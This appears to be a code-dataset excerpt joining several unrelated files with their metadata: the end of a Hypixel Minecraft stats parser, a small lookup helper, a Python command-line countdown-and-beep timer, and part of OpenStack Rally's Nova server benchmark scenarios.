"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_damage_dealt", 0),
},
},
"classic": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_classic_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_damage_dealt", 0),
},
"skywars": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_sw_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_damage_dealt", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_sw_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_damage_dealt", 0),
}
},
"uhc": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_damage_dealt", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_damage_dealt", 0),
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_damage_dealt", 0),
},
"deathmatch": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_damage_dealt", 0),
}
}
},
"paintball": {
"coins": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("coins", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("wins", 0),
"killstreaks": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("killstreaks", 0),
"shots_fired": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("shots_fired", 0)
},
"skywars": {
"level_data": (await core.minecraft.hypixel.static.static.get_skywars_level_data_from_experience(
(player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("skywars_experience", 0)))),
"coins": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("coins", 0),
"tokens": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("cosmetic_tokens", 0),
"souls": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("souls", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("losses", 0),
"games_played": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get(
"games_played_skywars", 0)
}
}
await core.caches.players.save_player_data(uuid, player)
return player
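The deeply repeated player_json.get("player", {}).get("stats", {})... chains above could be collapsed with a tiny path-walking helper. The sketch below is illustrative only — the dig helper and the sample data are not part of the file above:

def dig(mapping, *keys, default=0):
    """Walk nested dicts; return `default` if any key along the path is missing."""
    for key in keys:
        if not isinstance(mapping, dict) or key not in mapping:
            return default
        mapping = mapping[key]
    return mapping

# Minimal sample payload standing in for the real Hypixel response.
player_json = {"player": {"stats": {"Bedwars": {"eight_two_voidless_final_kills_bedwars": 7}}}}
final_kills = dig(player_json, "player", "stats", "Bedwars", "eight_two_voidless_final_kills_bedwars")
void_deaths = dig(player_json, "player", "stats", "Bedwars", "eight_two_voidless_void_deaths")
print(final_kills, void_deaths)   # 7 0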
| 79.969524
| 121
| 0.459175
|
9cb1e7c8f63b1956c75ff93d15cafb794c32f575
| 4,914
|
py
|
Python
|
ding/ding.py
|
liviu-/ding
|
14e49439b3898ba364921fe8519b3befd2f2ef01
|
[
"MIT"
] | 417
|
2016-10-02T19:15:05.000Z
|
2022-02-04T11:31:27.000Z
|
ding/ding.py
|
liviu-/ding
|
14e49439b3898ba364921fe8519b3befd2f2ef01
|
[
"MIT"
] | 11
|
2016-09-30T14:38:07.000Z
|
2016-10-28T21:04:02.000Z
|
ding/ding.py
|
liviu-/ding
|
14e49439b3898ba364921fe8519b3befd2f2ef01
|
[
"MIT"
] | 23
|
2016-10-04T00:23:49.000Z
|
2022-02-26T00:57:43.000Z
|
#!/usr/bin/env python
"""Simple CLI beep tool"""
from __future__ import unicode_literals
from __future__ import print_function
import re
import os
import sys
import time
import datetime
import argparse
VERSION = '2.1.0'
N_BEEPS = 4
WAIT_BEEPS = 0.15
def relative_time(arg):
"""Validate user provided relative time"""
    if not re.match(r'\d+[smh]( +\d+[smh])*', arg):
raise argparse.ArgumentTypeError("Invalid time format: {}".format(arg))
return arg
def absolute_time(arg):
"""Validate user provided absolute time"""
if not all([t.isdigit() for t in arg.split(':')]):
raise argparse.ArgumentTypeError("Invalid time format: {}".format(arg))
# Valid time (e.g. hour must be between 0..23)
try:
datetime.time(*map(int, arg.split(':')))
except ValueError as e:
raise argparse.ArgumentTypeError("Invalid time format: {}".format(e))
return arg
def get_args(args):
"""Parse commandline arguments"""
parent_parser = argparse.ArgumentParser(
add_help=False, description='Lightweight time management CLI tool')
parent_parser.add_argument(
'-n', '--no-timer', action='store_true', help='Hide the countdown timer')
parent_parser.add_argument(
'-c', '--command', type=str, help='Use a custom command instead of the default beep')
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--version', action='version', version=VERSION)
subparsers = parser.add_subparsers(dest='mode')
subparsers.required = True
parser_in = subparsers.add_parser('in', parents=[parent_parser])
parser_in.add_argument('time', nargs='+', type=relative_time,
                           help=r'relative time \d+[smh]( +\d+[smh])* (e.g. 1h 30m)')
parser_every = subparsers.add_parser('every', parents=[parent_parser])
parser_every.add_argument('time', nargs='+', type=relative_time,
                              help=r'relative time \d+[smh]( +\d+[smh])* (e.g. 2m 15s)')
parser_at = subparsers.add_parser('at', parents=[parent_parser])
parser_at.add_argument('time', type=absolute_time, help='absolute time [hh:[mm[:ss]]]')
return parser.parse_args(args)
class TimeParser():
"""Class helping with parsing user provided time into seconds"""
time_map = {
's': 1,
'm': 60,
'h': 60 * 60,
}
def __init__(self, time, relative):
self.time = time
self.relative = relative
def get_seconds(self):
return self._get_seconds_relative() if self.relative else self._get_seconds_absolute()
def _get_seconds_relative(self):
return sum([self.time_map[t[-1]] * int(t[:-1]) for t in self.time])
def _get_seconds_absolute(self):
now = datetime.datetime.now()
user_time = (datetime.datetime.combine(datetime.date.today(),
datetime.time(*map(int, self.time.split(':')))))
return ((user_time - now).seconds if user_time > now
else (user_time + datetime.timedelta(days=1) - now).seconds)
def countdown(seconds, notimer=False):
"""Countdown for `seconds`, printing values unless `notimer`"""
if not notimer:
os.system('cls' if os.name == 'nt' else 'clear') # initial clear
while seconds > 0:
start = time.time()
# print the time without a newline or carriage return
# this leaves the cursor at the end of the time while visible
if not notimer:
print(datetime.timedelta(seconds=seconds), end='')
sys.stdout.flush()
seconds -= 1
time.sleep(1 - time.time() + start)
# emit a carriage return
# this moves the cursor back to the beginning of the line
# so the next time overwrites the current time
if not notimer:
print(end='\r')
def beep(seconds, command):
"""Make the beep noise"""
for _ in range(N_BEEPS):
if command:
os.system(command)
else:
sys.stdout.write('\a')
sys.stdout.flush()
time.sleep(WAIT_BEEPS)
def parse_time(args):
"""Figure out the number of seconds to wait"""
relative = args.mode == 'in' or args.mode == "every"
parser = TimeParser(args.time, relative)
return parser.get_seconds()
def main(args=sys.argv[1:]):
args = get_args(args)
while True:
try:
seconds = parse_time(args)
countdown(seconds, args.no_timer)
beep(seconds, args.command)
# doing `if` here so there just can't be any stack printed for an interrupt
if args.mode != "every":
break
except KeyboardInterrupt:
print() # ending current line
break # without printing useless stack...
if __name__ == '__main__':
main()
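A quick usage sketch, not part of ding.py itself: assuming the file is importable as a module named ding, its argument parsing and time conversion can be exercised directly:

from ding import get_args, parse_time

args = get_args(["in", "1h", "30m"])   # relative mode: 1 hour + 30 minutes
print(parse_time(args))                # 5400 seconds
args = get_args(["at", "07:30"])       # absolute mode: the next 07:30
print(parse_time(args))                # seconds from now until 07:30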
| 32.979866
| 98
| 0.610297
|
a84b22812bab0dee55457d4b527df317da5e5897
| 30,108
|
py
|
Python
|
rally/plugins/openstack/scenarios/nova/servers.py
|
aforalee/rallyALi
|
8050ca08b0e253aeb19a1cec34f33c648f00136a
|
[
"Apache-2.0"
] | 2
|
2015-02-06T11:03:12.000Z
|
2015-03-02T10:39:44.000Z
|
rally/plugins/openstack/scenarios/nova/servers.py
|
aforalee/rallyALi
|
8050ca08b0e253aeb19a1cec34f33c648f00136a
|
[
"Apache-2.0"
] | null | null | null |
rally/plugins/openstack/scenarios/nova/servers.py
|
aforalee/rallyALi
|
8050ca08b0e253aeb19a1cec34f33c648f00136a
|
[
"Apache-2.0"
] | 2
|
2016-03-16T03:52:13.000Z
|
2020-10-02T07:58:50.000Z
|
# Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import jsonschema
from rally.common import log as logging
from rally import consts
from rally import exceptions as rally_exceptions
from rally.plugins.openstack import scenario
from rally.plugins.openstack.scenarios.cinder import utils as cinder_utils
from rally.plugins.openstack.scenarios.nova import utils
from rally.plugins.openstack.wrappers import network as network_wrapper
from rally.task import types
from rally.task import utils as task_utils
from rally.task import validation
LOG = logging.getLogger(__name__)
class NovaServers(utils.NovaScenario,
cinder_utils.CinderScenario):
"""Benchmark scenarios for Nova servers."""
RESOURCE_NAME_PREFIX = "rally_novaserver_"
RESOURCE_NAME_LENGTH = 16
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_list_server(self, image, flavor,
detailed=True, **kwargs):
"""Boot a server from an image and then list all servers.
Measure the "nova list" command performance.
If you have only 1 user in your context, you will
add 1 server on every iteration. So you will have more
and more servers and will be able to measure the
performance of the "nova list" command depending on
the number of servers owned by users.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param detailed: True if the server listing should contain
detailed information about all of them
:param kwargs: Optional additional arguments for server creation
"""
self._boot_server(image, flavor, **kwargs)
self._list_servers(detailed)
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def list_servers(self, detailed=True):
"""List all servers.
        This simple scenario tests the nova list command by listing
all the servers.
:param detailed: True if detailed information about servers
should be listed
"""
self._list_servers(detailed)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_delete_server(self, image, flavor,
min_sleep=0, max_sleep=0,
force_delete=False, **kwargs):
"""Boot and delete a server.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
        to simulate a pause between server creation and deletion
(of random duration from [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self.sleep_between(min_sleep, max_sleep)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_delete_multiple_servers(self, image, flavor, count=2,
min_sleep=0, max_sleep=0,
force_delete=False, **kwargs):
"""Boot multiple servers in a single request and delete them.
Deletion is done in parallel with one request per server, not
with a single request for all servers.
:param image: The image to boot from
:param flavor: Flavor used to boot instance
:param count: Number of instances to boot
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for instance creation
"""
servers = self._boot_servers(image, flavor, 1, instances_amount=count,
**kwargs)
self.sleep_between(min_sleep, max_sleep)
self._delete_servers(servers, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova", "cinder"]})
def boot_server_from_volume_and_delete(self, image, flavor,
volume_size,
min_sleep=0, max_sleep=0,
force_delete=False, **kwargs):
"""Boot a server from volume and then delete it.
The scenario first creates a volume and then a server.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between volume creation and deletion
(of random duration from [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param volume_size: volume size (in GB)
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
volume = self._create_volume(volume_size, imageRef=image)
block_device_mapping = {"vda": "%s:::1" % volume.id}
server = self._boot_server(image, flavor,
block_device_mapping=block_device_mapping,
**kwargs)
self.sleep_between(min_sleep, max_sleep)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_bounce_server(self, image, flavor,
force_delete=False, actions=None, **kwargs):
"""Boot a server and run specified actions against it.
Actions should be passed into the actions parameter. Available actions
are 'hard_reboot', 'soft_reboot', 'stop_start' and 'rescue_unrescue'.
Delete server after all actions were completed.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param actions: list of action dictionaries, where each action
                        dictionary specifies an action to be performed
in the following format:
{"action_name": <no_of_iterations>}
:param kwargs: Optional additional arguments for server creation
"""
action_builder = self._bind_actions()
actions = actions or []
try:
action_builder.validate(actions)
except jsonschema.exceptions.ValidationError as error:
raise rally_exceptions.InvalidConfigException(
"Invalid server actions configuration \'%(actions)s\' due to: "
"%(error)s" % {"actions": str(actions), "error": str(error)})
server = self._boot_server(image, flavor, **kwargs)
for action in action_builder.build_actions(actions, server):
action()
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_lock_unlock_and_delete(self, image, flavor,
min_sleep=0, max_sleep=0,
force_delete=False,
**kwargs):
"""Boot a server, lock it, then unlock and delete it.
Optional 'min_sleep' and 'max_sleep' parameters allow the
scenario to simulate a pause between locking and unlocking the
server (of random duration from min_sleep to max_sleep).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param min_sleep: Minimum sleep time between locking and unlocking
in seconds
:param max_sleep: Maximum sleep time between locking and unlocking
in seconds
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._lock_server(server)
self.sleep_between(min_sleep, max_sleep)
self._unlock_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.GLANCE)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova", "glance"]})
def snapshot_server(self, image, flavor,
force_delete=False, **kwargs):
"""Boot a server, make its snapshot and delete both.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
image = self._create_image(server)
self._delete_server(server, force=force_delete)
server = self._boot_server(image.id, flavor, **kwargs)
self._delete_server(server, force=force_delete)
self._delete_image(image)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_server(self, image, flavor, auto_assign_nic=False, **kwargs):
"""Boot a server.
Assumes that cleanup is done elsewhere.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param auto_assign_nic: True if NICs should be assigned
:param kwargs: Optional additional arguments for server creation
"""
self._boot_server(image, flavor,
auto_assign_nic=auto_assign_nic, **kwargs)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova", "cinder"]})
def boot_server_from_volume(self, image, flavor, volume_size,
auto_assign_nic=False, **kwargs):
"""Boot a server from volume.
The scenario first creates a volume and then a server.
Assumes that cleanup is done elsewhere.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param volume_size: volume size (in GB)
:param auto_assign_nic: True if NICs should be assigned
:param kwargs: Optional additional arguments for server creation
"""
volume = self._create_volume(volume_size, imageRef=image)
block_device_mapping = {"vda": "%s:::1" % volume.id}
self._boot_server(image, flavor, auto_assign_nic=auto_assign_nic,
block_device_mapping=block_device_mapping,
**kwargs)
def _bind_actions(self):
actions = ["hard_reboot", "soft_reboot", "stop_start",
"rescue_unrescue"]
action_builder = task_utils.ActionBuilder(actions)
action_builder.bind_action("hard_reboot", self._reboot_server)
action_builder.bind_action("soft_reboot", self._soft_reboot_server)
action_builder.bind_action("stop_start",
self._stop_and_start_server)
action_builder.bind_action("rescue_unrescue",
self._rescue_and_unrescue_server)
return action_builder
def _stop_and_start_server(self, server):
"""Stop and then start the given server.
A stop will be issued on the given server upon which time
this method will wait for the server to become 'SHUTOFF'.
Once the server is SHUTOFF a start will be issued and this
method will wait for the server to become 'ACTIVE' again.
:param server: The server to stop and then start.
"""
self._stop_server(server)
self._start_server(server)
def _rescue_and_unrescue_server(self, server):
"""Rescue and then unrescue the given server.
A rescue will be issued on the given server upon which time
this method will wait for the server to become 'RESCUE'.
        Once the server is RESCUE an unrescue will be issued and
this method will wait for the server to become 'ACTIVE'
again.
:param server: The server to rescue and then unrescue.
"""
self._rescue_server(server)
self._unrescue_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType,
to_flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def resize_server(self, image, flavor, to_flavor,
force_delete=False, **kwargs):
"""Boot a server, then resize and delete it.
This test will confirm the resize by default,
or revert the resize if confirm is set to false.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param to_flavor: flavor to be used to resize the booted instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._resize(server, to_flavor)
# by default we confirm
confirm = kwargs.get("confirm", True)
if confirm:
self._resize_confirm(server)
else:
self._resize_revert(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def suspend_and_resume_server(self, image, flavor,
force_delete=False, **kwargs):
"""Create a server, suspend, resume and then delete it
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._suspend_server(server)
self._resume_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def pause_and_unpause_server(self, image, flavor,
force_delete=False, **kwargs):
"""Create a server, pause, unpause and then delete it
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._pause_server(server)
self._unpause_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def shelve_and_unshelve_server(self, image, flavor,
force_delete=False, **kwargs):
"""Create a server, shelve, unshelve and then delete it
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._shelve_server(server)
self._unshelve_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_live_migrate_server(self, image,
flavor, block_migration=False,
disk_over_commit=False, min_sleep=0,
max_sleep=0, **kwargs):
"""Live Migrate a server.
This scenario launches a VM on a compute node available in
the availability zone and then migrates the VM to another
compute node on the same availability zone.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between VM booting and running live migration
(of random duration from range [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
